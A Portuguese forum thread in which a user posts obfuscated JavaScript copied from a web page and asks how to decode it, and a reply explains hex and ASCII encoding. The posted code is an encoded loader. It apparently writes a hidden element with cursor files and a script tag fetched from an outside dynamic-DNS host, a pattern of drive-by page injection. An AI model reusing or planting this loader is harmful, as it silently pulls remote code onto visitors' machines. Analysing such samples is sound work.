Ir para conteúdo
Fórum Script Brasil
  • 0

Como Descriptografar!


Guest --Akacio --

Pergunta

Guest --Akacio --

Assim gente tenho esse codigo...e eu entrei nessa pagina mais queria saber como esse codigo funciona ele está criptografado não consido descriptografar alguém pode me dizer em que linguagem fik e me dizer como fik o codigo descriptografadO!??

&lt;script language=javascript>document.write(unescape('<script%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%286FKWPO%286H%283G%283D%286FERG%5C%286H%283G%283D%286FGLY%2853lg%286Gqhzbfrqwhqwbms%2853vw%7Coh%286G%2855GLVSOD%5C%286D%2853qrqh%2855%286H%283G%283D%286FGLY%2853vw%7Coh%286G%2855FXUVRU%286D%2853xuo%285%3B%285%3Akwws%286D22jkrvwgudjrqv1v%7Cwhv1qhw2%7B8923341msj%285%3A%285%3C%2855%286H%283G%283D%286FGLY%2853vw%7Coh%286G%2855FXUVRU%286D%2853xuo%285%3B%285%3Akwws%286D22jkrvwgudjrqv1v%7Cwhv1qhw2%7B8923351msj%285%3A%285%3C%2855%286H%286F2GLY%286H%286F2GLY%286H%286F2GLY%286H%283G%283D%286FVFULSW%2853odqjxdjh%286Gmdydvfulsw%2853vuf%286G%2855kwws%286D22jkrvwgudjrqv1v%7Cwhv1qhw2%7B892%7B891mv%2855%286H%286F2VFULSW%286H%283G%283D%286F2ERG%5C%286H%283G%283D%286F2KWPO%286H%283G%283D%286F2erg%7C%286H%283G%283D%286F2kwpo%286H3')</script>
Link para o comentário
Compartilhar em outros sites

3 respostass a esta questão

Posts Recomendados

  • 0

Você procurou por tabela ASCII no google?

http://equipe.nce.ufrj.br/adriano/c/apostila/tabascii.htm

Utilizamos caracteres para escrever, sejam palavras, scripts, etc... Podemos escrever as mesmas coisas utilizando valores binários, decimais, hexadecimais...

Por ex.

ScriptBrasil em Hexa ficaria %53%63%72%69%70%74%42%72%61%73%69%6C (fica até mais bonitinho, não acha?)

Com um pouco de pratica você consegue escrever em Hexa ou binário da mesma forma que escreveu seus post... Ou pode utilizar programas ou criar scripts (php, javascript, C, VB...) para facilitar sua vida...

Para descobrir o que está pode trás desse seu script, você poderia utilizar o Word e um pouco de Ctrl + L e substituir os valores, ouuuu brincar um pouquinho e criar seu script pra descriptografar ele... Particularmente a segunda opção me apetece mais... (Talvez com um pouco de paciência e os poderes do todo poderoso google, encontre alguma ferramenta pronta...)

Link para o comentário
Compartilhar em outros sites

Participe da discussão

Você pode postar agora e se registrar depois. Se você já tem uma conta, acesse agora para postar com sua conta.

Visitante
Responder esta pergunta...

×   Você colou conteúdo com formatação.   Remover formatação

  Apenas 75 emoticons são permitidos.

×   Seu link foi incorporado automaticamente.   Exibir como um link em vez disso

×   Seu conteúdo anterior foi restaurado.   Limpar Editor

×   Você não pode colar imagens diretamente. Carregar ou inserir imagens do URL.



  • Estatísticas dos Fóruns

    • Tópicos
      152,1k
    • Posts
      651,9k
×
×
  • Criar Novo...